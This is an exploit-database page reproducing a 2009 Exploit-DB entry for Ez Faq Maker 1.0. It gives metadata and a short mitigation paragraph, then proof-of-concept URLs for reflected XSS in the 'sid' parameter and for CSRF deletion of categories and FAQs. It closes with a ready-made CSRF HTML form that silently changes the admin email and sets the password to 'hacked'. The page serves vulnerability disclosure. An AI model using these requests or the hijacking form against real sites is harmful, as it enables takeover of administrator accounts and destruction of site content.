header-logo
Suggest Exploit
vendor:
Ez Faq Maker
by:
Milos Zivanovic
8.8
CVSS
HIGH
XSS And Multiple XSRF Vulnerabilities
79, 352
CWE
Product Name: Ez Faq Maker
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:scriptsez:ez_faq_maker
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2009

Ez Faq Maker Multiple Vulnerabilities

The Ez Faq Maker application version 1.0 is vulnerable to XSS and multiple XSRF vulnerabilities. The XSS vulnerability exists in the front end of the application, where an attacker can inject malicious JavaScript code into the 'sid' parameter of the 'index.php' page. The multiple XSRF vulnerabilities exist in the admin panel, where an attacker can delete a category or FAQ by sending a malicious request to the 'admin.php' page. Additionally, the application does not have any protection against changing the admin info.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in the application. Additionally, developers should implement proper authentication and authorization mechanisms to protect against XSRF attacks.
Source

Exploit-DB raw data:

[#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Faq Maker Multiple Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 15. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Faq Maker
[#] Version: 1.0
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&cat=News%20Publishing&id=1898312927
[#] Price: 24 USD
[#] Vulnerability: XSS And Multiple XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]

[#]Content
 |--XSS in front end
 |--Admin Panel
 |  |--Remove category by id
 |  |--Remove faq by id
 |  |--Change admin info

[-]XSS in front end

[POC----------------------------------------------------------------------------------------------]
http://localhost/faq/index.php?action=showcat&cid=8&sid="[XSS]
http://localhost/faq/index.php?action=showcat&cid=8&sid="
[POC----------------------------------------------------------------------------------------------]

[#]Admin Panel

[-]Remove category by id

[POC----------------------------------------------------------------------------------------------]
http://localhost/faq/admin.php?action=categories&do=delete&op=[ID]
[POC----------------------------------------------------------------------------------------------]

[-]Remove faq by id

[POC----------------------------------------------------------------------------------------------]
http://localhost/faq/admin.php?action=delete&id=[ID]
[POC----------------------------------------------------------------------------------------------]

[*]Change admin info

When i opened this section of admin panel i noticed that in url there
was this: &sid=7e52dbb283b4515b82663d6c82f9b67d
at first i thought that there's cross site request forgery protection,
but then i realized that script programmer put that there just for
show, it doesn't do anything. I've first change the value of sid
parameter and script worked just fine, then i removed entire sid from
url, and script still worked fine. When i tested the next exploit it
worked fine, but if you encounter any problems just change form action
and add the sid i posted couple lines ago.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/faq/admin.php?action=admin_opt" method="post">
  <input type="hidden" name="email" value="my@newemail.com">
  <input type="hidden" name="password" value="hacked">
  <input type="hidden" name="company" value="hacked company">
  <input type="hidden" name="add" value="true">
  <input type="submit" name="submit" value=" CHANGE ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]EOF